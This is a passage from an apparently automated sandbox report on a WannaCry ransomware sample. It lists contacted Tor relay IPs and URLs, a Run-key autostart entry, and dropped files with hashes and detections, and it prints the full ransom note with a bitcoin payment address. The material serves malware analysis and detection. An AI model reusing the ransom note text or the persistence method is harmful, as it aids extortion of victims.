                  • Avira URL Cloud: safe
                  		unknown
                  https://blog.torproject.org/blog/lifecycle-of-a-new-relayError@WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$@WanaDecryptor@.exe, 00000019.00000002.6616025428.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/search?q=how@WanaDecryptor@.exefalse
                        		high
                        http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmptrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.zlib.net/D@WanaDecryptor@.exe, 00000019.00000003.2894051927.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.2893794519.00000000027B1000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip@WanaDecryptor@.exefalse
                            		high
                            https://blog.torproject.org/blog/lifecycle-of-a-new-relay@WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B@WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpfalse
                                		high
                                https://386bsd.nettaskhsvc.exe, 0000001E.00000003.2944209026.0000000003428000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001E.00000003.2953031017.000000000446D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                171.25.193.9
                                		unknownSweden
                                		198093DFRI-ASForeningenfordigitalafri-ochrattigheterSEfalse
                                92.205.17.93
                                		unknownGermany
                                		8972GD-EMEA-DC-SXB1DEfalse
                                95.130.11.147
                                		unknownFrance
                                		196689DIGICUBE01FRfalse
                                18.18.82.18
                                		unknownUnited States
                                		3MIT-GATEWAYSUSfalse

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:795237
                                Start date and time:2023-01-31 16:10:58 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 21m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:51
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample file name:2N2jefqo8e.exe
                                Detection:MAL
                                Classification:mal100.rans.spyw.evad.winEXE@38/892@0/5
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 99.9% (good quality ratio 74.3%)
                                • Quality average: 59.8%
                                • Quality standard deviation: 38.8%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 89
                                • Number of non-executed functions: 249
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                Warnings

                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, VSSVC.exe, UsoClient.exe
                                • Excluded IPs from analysis (whitelisted): 20.190.159.0, 40.126.31.71, 20.190.159.2, 20.190.159.23, 20.190.159.71, 20.190.159.75, 40.126.31.73, 20.190.159.68, 2.20.216.252
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, e15275.g.akamaiedge.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, wdcpalt.microsoft.com, prda.aadg.msidentity.com, login.live.com, wildcard.weather.microsoft.com.edgekey.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                16:15:28AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run atbiaihkhzu126 "C:\Users\user\Desktop\tasksche.exe"

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                171.25.193.9oGO7Hy4YCH.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                SPXp2YHDFz.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                ILI1MGzcig.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                lwRhzjuYIg.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                OVrJ9mtD6Y.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                F75rJPKdGb.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                ozJy5Zf5cf.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                zfpLjnr5P9.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                kecFPnbu5K.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                SecuriteInfo.com.Trojan.Kronos.21.31435.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                530000.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                6d0000.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                6729001591617.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                NNrUb9Avaw.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                taugif.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                9WajXSHVwg.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                62ea.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                00.exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                .exeGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus
                                bill4759.docGet hashmaliciousBrowse
                                • 171.25.193.9/tor/status-vote/current/consensus

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                GD-EMEA-DC-SXB1DElLicxyp3Ad.elfGet hashmaliciousBrowse
                                • 85.25.248.158
                                vvCPWuzCU3.elfGet hashmaliciousBrowse
                                • 62.138.132.160
                                AUIoXxgku9.elfGet hashmaliciousBrowse
                                • 62.138.132.160
                                Pagamento01242023,jpg.exeGet hashmaliciousBrowse
                                • 91.250.86.178
                                SO#69055.exeGet hashmaliciousBrowse
                                • 92.205.64.107
                                DR-1032Y670.exeGet hashmaliciousBrowse
                                • 92.205.64.107
                                CONFIRMACI#U00d3N DE PAGO.exeGet hashmaliciousBrowse
                                • 92.205.8.125
                                Pagamento jpg.exeGet hashmaliciousBrowse
                                • 91.250.86.178
                                Mastigophoric.exeGet hashmaliciousBrowse
                                • 92.205.64.107
                                P585coqkU5.elfGet hashmaliciousBrowse
                                • 85.25.34.213
                                tBWe0cmiBd.dllGet hashmaliciousBrowse
                                • 83.169.21.32
                                boJpCHgKfd.dllGet hashmaliciousBrowse
                                • 85.25.120.45
                                SecuriteInfo.com.Trojan.PackedNET.738.11942.25119.exeGet hashmaliciousBrowse
                                • 92.204.53.113
                                difference between license agreement and concession agreement 66378.jsGet hashmaliciousBrowse
                                • 92.205.53.175
                                SecuriteInfo.com.W32.MSIL_Kryptik.DWR.gen.Eldorado.28995.8870.exeGet hashmaliciousBrowse
                                • 91.250.86.178
                                SecuriteInfo.com.Win32.TrojanX-gen.20277.31807.exeGet hashmaliciousBrowse
                                • 91.250.86.178
                                SecuriteInfo.com.PWSX-gen.26924.6799.exeGet hashmaliciousBrowse
                                • 91.250.86.178
                                N0pq5eqonB.dllGet hashmaliciousBrowse
                                • 85.25.120.45
                                N0pq5eqonB.dllGet hashmaliciousBrowse
                                • 85.25.120.45
                                0pKiahZhbS.elfGet hashmaliciousBrowse
                                • 37.200.101.36
                                DFRI-ASForeningenfordigitalafri-ochrattigheterSEoGO7Hy4YCH.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                http://171.25.193.77Get hashmaliciousBrowse
                                • 171.25.193.77
                                puzykxm8rg.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                SPXp2YHDFz.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                ILI1MGzcig.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                hrgJ85rPgh.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                Yy6S2zcubl.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                svchost.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                lwRhzjuYIg.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                tinynuke.exeGet hashmaliciousBrowse
                                • 171.25.193.78
                                MfgWK7o4wz.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                OVrJ9mtD6Y.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                F75rJPKdGb.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                ozJy5Zf5cf.exeGet hashmaliciousBrowse
                                • 171.25.193.20
                                NtA6ABwq75.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                IIfekfeu6C.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                JNk46WKTxo.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                y2N49ht6t4.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                zfpLjnr5P9.exeGet hashmaliciousBrowse
                                • 171.25.193.9
                                demande de prix(1).exeGet hashmaliciousBrowse
                                • 171.25.193.9

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Yara Hits:
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\@WanaDecryptor@.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 96%
                                • Antivirus: Virustotal, Detection: 91%, Browse
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1368
                                Entropy (8bit):7.833229274628152
                                Encrypted:false
                                SSDEEP:24:bkoZAE890LBPHIxKSJhwIKtaJwH5t1wbbZDsFSwrfIr44K+P8/HhIDIp:bkvExLmKGh88Y5fwdWSw8Zpk5IDIp
                                MD5:3A8BA42E6CB4A554D2611C4243655D89
                                SHA1:1AFC3B8998B761F3247FEED62F5BF3288D7364CC
                                SHA-256:6904FA25E0D3F5DC7513443D3EC74FEC62EE2DD2FFC972BF5EF818EB496373A0
                                SHA-512:23D67888B2D87D964E324C1069C768D2F58333ADA53019F4A5BA01E4B31CF62B297B51BE81C6105350B60F51FB10B44004B924E5F7CA1D8F5D6504A7F617B6E4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....y.W^..9..2o....C6D.8S....`......pF..\X....f.|..x<I.V.....m.8.Q..W.&......#."4)..CQ.nq.L.8b..5...s....=.K...>..B.......\/.@#;........EN...@&.....Z.-18F.."1!.A+.:.u..&..e.j.V...}...|h._....-...bC.!5.....yn638...a...:........Z.._+.C.Nf.E......]W.-f.....=........T...e..V...<.f.I.M.l...B....b9..=.....=.o.g.s.......B....+c..........;..e.*P..:.....`ry.d..R.....CI.yL.>......9.Wvq...h...[..O{*...9..(.......//K[.'!G.8J.Q.......`3.w..3.....F..}X..'...Z.Vn)h-.;?..r...bE.#Go..6...Y...DM1....Z.PAw.?w:.`}.L..d..I.s..i.`D..b.q..jJf.#.jsD....L....b4@e<1.fd.6~M9.$D...4;.].R...N...... ..J..!. f..03.W..h......'..........i/XI.b..g>..>_dp.....z....cl...,o]q.+.........V%...z.....K..Xa.J......../.8..P.......P;..a...C....)s..{R.e....m0..D.....V.;3...[.A{.....{.V...5q...0.....|.. .....HT..4..I.*E.;..{........kud.3X.g....w.J....@.XR..^...w./.YYs|Gxo..K.wS>..EPz..FV.e.*m..VR...M.|.._....C..8.\.rQ.]...S..7..!z.....:.3j..@^.=......52.D?.'.....+~..6....X.

                                C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9658633222462845
                                Encrypted:false
                                SSDEEP:96:ocJ9zbhdetqPaq52m0TjlX+rgDvMSeQV3s82l08EwxUNZo1RRcquaxFj:vzbbe0Pj5OlM6jVs8gpGN2z39xFj
                                MD5:DD35115478B5F07C899D5BDCC061DEE2
                                SHA1:1F6A498AC08D48A83C81C486A775124C5E6946BC
                                SHA-256:5E4AD93033D1230E8AF3553698B1FF5EC7039FEBCC3EA3C03329830F69DD4BA2
                                SHA-512:63962F1E6F8891E2D62014B0030912C959E583F3CD73C8CFFC3B80FDBECF6A9BD2D0F2A7AAD03555DE109C0635E11384EBB813F320080C44A8A2430E04485E55
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....4.Q3..%.>j..hk~cW.....~.5..%.2Q.nR`.Jt>.(t.....8.[.F...I.F...6..Sal};..Q..GJ...-...A......g...tR...U>...in..>;,....lxG.iS. (.7y..!P.v....0}e..sv.`.m,....3...r.]!.5.......X.j4N.....B..pjj>....#.....Q..8.N....,D.A..y...%...@...g.7..$..yd.{.[4...r.GE.d..................K..8y...}.....c.?Wnk....Am.[#D..(Hw$.h........z...Wa..E.GKc....T.4w..`.R....tg..).CuY.......&.GP...*E...3.....;.[...]@...'.l4.;9m.Wk.......h.K....;.Z...m.U.[U..3R..n..0..."].;...;...K.N.....!UT. p..b(...*Ph'..."p.........E.#..Q.u...-Ig....G.6...;.L..u...l._..Lu.......P.C.qOz=I0+O.a.BHR..i...ZG..?I.lZe}.%.....!HDR..N..K.X.......b...S.............x5T.$.%.N...G....E]...k...fKZ.......EtW8X7.9P.g@.W...K..75..L...&.#......R.O..ME........;....<X.U...&Yr...<G.nE...l?.C..pr..X..V.H......-.j.(..z.un..}@.L..P._n.YP...C..,...r;X:..I..*.....-.9. 1..1.....8...6>....v..A4.....E...x.N..l*?....`....d..*..y...Hw.qs5.........CK.am..3<1M.."Z-$.B.ov.u......2.d...x..5D..\...l....a2,.....^.

                                C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9613632611220035
                                Encrypted:false
                                SSDEEP:96:oWRRQwg3dcEYBjywvWe7CgwEgm5WHUiHPulY3tk5+jY/Wr4R6EogmQkx4F6V:7/QhCFv9wDq/iHMYaYE/Y4AFQM4wV
                                MD5:A17FDAE00CEDDB34B552197373C79E7D
                                SHA1:446256E6449BE353B14ED9DFE3EF34E5F81E2304
                                SHA-256:F24BF1784673FDC7DACFFB1810C833A591864F039EF4E9FF2199F4EE08F43416
                                SHA-512:7DB6CA58A85411D7BBC228E83023D135D76A79865A9ABA1CFE269D1A1B3CB2784AE52BA4D77ED56C665E5E5234A8D994406351D0C06CC2403B34C76C332C88C8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......eN,\l...;y.p....Q.s.1QH..'U.C..0.....k..#}.!.gz........6jGvK....9' %mZ.#..@B....B...,x..$Pp...t..K....G..[... K.....`.0....'.....e..L.\+.Yk.:Z.......^. 8...d..w.+...:F....4.\a3...O+.n..r..l..D,.....P.F.]...1.....f..3.9....LyF.....3...................`$.x.s...I....r...7}u..k...<..c..6..Y.J0..D.n:m.A..8.<...G..jq...="Z6V.r..?....![..0$.c....>.;[..?~a....<:e..t.. ...].G.j{k"..p...25-q..8W.`.Z[...Ajf.....fO...W-$M...&yG%...].;.`.)..K..s`.7I.4..Cy....7.:F.H....0.D...,.Jh.}.{;'M......QQ.>..q.S.U../..<....t.@......../;q.....p.$D....I8i-Z.Tc...w.5.H{..'Zq....V..b..A.:`.8..l.<.I?Xl....<H.d....[.c%..[\Y..H...!.6wU......6.....d....I......F5J..F~.E.....Z.......7..|..-....F.......x.@Y.E.Q.=9....'.U.4..v.r...-...c*.t..3....4g..).-..T)._Lo)..,j_.....t..?[l..5..l.....!0.jK.#.;S...w.N.r6......q.;...e.P..h.".............G..S2..!..S%o..WM.......n...y....W.D.H.L..XU....D...j.q.?I...x3F.......{.g...........t4)TD..~...p..(=.k.U).3Z

                                C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):516712
                                Entropy (8bit):7.999587931693368
                                Encrypted:true
                                SSDEEP:12288:+fjtxPusI/Novbz4jhREsuZ93gGjkbGK5frqwXVAUSKNuJzceiU:+f7usxvbQGf93djYGErqAi3xJ9iU
                                MD5:4379E8A892DFDF0132DBD460F3DA2DC0
                                SHA1:E677DB57DB795ADDFC59863F14929A15FA9890BA
                                SHA-256:2832B29DEFA7930A8D5FEF300B6C61AE5167D75CCCB1A5AE4BD5A363483474E0
                                SHA-512:7648C040237CEA8926A4AAA5EC07B5E1BEC7F7D83A2B1BFCA689AE3F2D667F879818C2A5832CEAA3B7BFB7A7BAFA82CE0B3AB72CDF6B426930D754BC25CF162D
                                Malicious:true
                                Reputation:unknown
